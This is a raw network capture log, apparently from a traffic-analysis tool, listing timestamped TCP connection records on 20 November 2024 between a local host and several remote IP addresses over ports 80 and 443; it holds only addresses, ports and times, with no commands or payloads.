                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.699645996 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.699659109 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.699675083 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.699708939 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.699708939 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.699753046 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.699765921 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.699785948 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.699815035 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.700274944 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.700289011 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.700303078 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.700319052 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.700334072 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.700371981 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.700371981 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.700388908 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.700473070 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.700522900 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.700596094 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.700612068 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.700635910 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.700675011 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.700707912 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.718133926 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.718148947 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.718163013 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.718266964 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.718266964 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.718303919 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.718318939 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.718342066 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.718358040 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.718380928 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.718396902 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.718409061 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.718409061 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.718411922 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.718435049 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.718450069 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.718463898 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.718463898 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.718480110 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.718496084 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.718509912 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.718514919 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.718514919 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.718524933 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.718539953 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.718555927 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.718569994 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.718585014 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.718585014 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.718585968 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.718600035 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.718604088 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.718645096 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.718797922 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.722176075 CET4434976113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.723645926 CET49761443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.723659992 CET4434976113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.724452972 CET49761443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.724457026 CET4434976113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.725276947 CET4434976213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.725759983 CET49762443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.725784063 CET4434976213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.726305008 CET49762443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.726310968 CET4434976213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.744810104 CET4434976013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.744960070 CET4434976013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.745038986 CET49760443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.749685049 CET49760443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.749708891 CET4434976013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.749731064 CET49760443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.749739885 CET4434976013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.754861116 CET49765443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.754904985 CET4434976513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.755132914 CET49765443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.755341053 CET49765443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.755352020 CET4434976513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.824481010 CET4434976113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.824532032 CET4434976113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.824605942 CET49761443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.831309080 CET4434976213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.831391096 CET4434976213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.831486940 CET49762443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.839212894 CET49761443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.839212894 CET49761443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.839227915 CET4434976113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.839237928 CET4434976113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.841162920 CET49762443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.841200113 CET4434976213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.841224909 CET49762443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.841233969 CET4434976213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.887020111 CET49766443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.887038946 CET4434976613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.887103081 CET49766443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.889745951 CET49767443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.889764071 CET4434976713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.889849901 CET49767443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.890819073 CET49766443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.890831947 CET4434976613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.891062021 CET49767443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.891072989 CET4434976713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.226475954 CET44349708173.222.162.64192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.226802111 CET49708443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.304225922 CET4434976413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.308074951 CET49764443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.308088064 CET4434976413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.308728933 CET49764443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.308732986 CET4434976413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.310743093 CET4434976313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.311795950 CET49763443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.311820984 CET4434976313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.312421083 CET49763443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.312426090 CET4434976313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.404059887 CET4434976413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.404126883 CET4434976413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.404205084 CET49764443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.413902044 CET4434976313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.414073944 CET4434976313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.414135933 CET49763443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.432090044 CET4434976513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.472700119 CET49765443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.494874954 CET49764443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.494895935 CET4434976413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.494910955 CET49764443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.494918108 CET4434976413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.496448040 CET49763443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.496467113 CET4434976313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.496478081 CET49763443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.496484995 CET4434976313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.501430988 CET49765443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.501445055 CET4434976513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.501905918 CET49765443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.501910925 CET4434976513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.510720015 CET49768443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.510765076 CET4434976813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.510899067 CET49768443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.511245966 CET49769443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.511274099 CET4434976913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.511275053 CET49768443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.511286974 CET4434976813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.511336088 CET49769443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.511428118 CET49769443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.511439085 CET4434976913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.530975103 CET4434976613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.531831980 CET49766443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.531848907 CET4434976613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.532507896 CET49766443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.532512903 CET4434976613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.563201904 CET4434976713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.606652021 CET4434976513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.607140064 CET4434976513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.607235909 CET49765443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.613322973 CET49767443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.632018089 CET49767443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.632030964 CET4434976713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.632752895 CET49767443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.632757902 CET4434976713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.636965990 CET4434976613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.637017965 CET4434976613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.637077093 CET49766443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.639455080 CET49766443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.639465094 CET4434976613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.639487028 CET49766443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.639492035 CET4434976613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.639978886 CET49765443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.639992952 CET4434976513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.640007973 CET49765443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.640012980 CET4434976513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.675565004 CET49770443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.675601006 CET4434977013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.675687075 CET49770443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.705847025 CET49770443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.705883026 CET4434977013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.713793993 CET49771443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.713819027 CET4434977113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.713901997 CET49771443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.716006994 CET49771443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.716022015 CET4434977113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.735588074 CET4434976713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.735666037 CET4434976713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.735730886 CET49767443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.749244928 CET49767443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.749260902 CET4434976713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.821468115 CET49772443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.821511030 CET4434977213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.821630955 CET49772443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.876084089 CET49772443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:22.876106977 CET4434977213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.044223070 CET49776443192.168.2.6142.250.184.228
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.044272900 CET44349776142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.044368982 CET49776443192.168.2.6142.250.184.228
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.044554949 CET49776443192.168.2.6142.250.184.228
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.044583082 CET44349776142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.072736979 CET4434976813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.115453959 CET49768443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.142445087 CET49768443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.142458916 CET4434976813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.142976999 CET49768443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.142982006 CET4434976813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.152020931 CET4434976913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.154546022 CET49769443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.154572964 CET4434976913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.155164003 CET49769443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.155168056 CET4434976913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.184218884 CET49777443192.168.2.6142.250.184.228
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.184256077 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.184331894 CET49777443192.168.2.6142.250.184.228
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.184602976 CET49777443192.168.2.6142.250.184.228
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.184633017 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.242053986 CET4434976813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.242130041 CET4434976813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.242178917 CET49768443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.256814003 CET4434976913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.256877899 CET4434976913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.256928921 CET49769443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.291018963 CET49778443192.168.2.6142.250.184.228
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.291079044 CET44349778142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.291081905 CET49768443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.291105032 CET4434976813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.291116953 CET49768443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.291126966 CET4434976813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.291155100 CET49778443192.168.2.6142.250.184.228
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.291429996 CET49769443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.291445017 CET4434976913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.291471958 CET49769443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.291479111 CET4434976913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.291515112 CET49778443192.168.2.6142.250.184.228
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.291532993 CET44349778142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.351979971 CET49779443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.352021933 CET4434977913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.352088928 CET49779443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.355716944 CET4434977113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.356678009 CET4434977013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.357481956 CET49780443192.168.2.6142.250.184.228
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.357492924 CET44349780142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.357554913 CET49780443192.168.2.6142.250.184.228
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.357892036 CET49780443192.168.2.6142.250.184.228
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.357906103 CET44349780142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.372703075 CET49779443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.372716904 CET4434977913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.374140024 CET49771443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.374147892 CET4434977113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.374624014 CET49771443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.374631882 CET4434977113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.374861956 CET49770443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.374870062 CET4434977013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.375294924 CET49770443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.375299931 CET4434977013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.392577887 CET49781443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.392611027 CET4434978113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.392676115 CET49781443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.395131111 CET49781443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.395145893 CET4434978113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.475162029 CET4434977113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.475377083 CET4434977113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.475476980 CET49771443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.478192091 CET49771443192.168.2.613.107.246.45
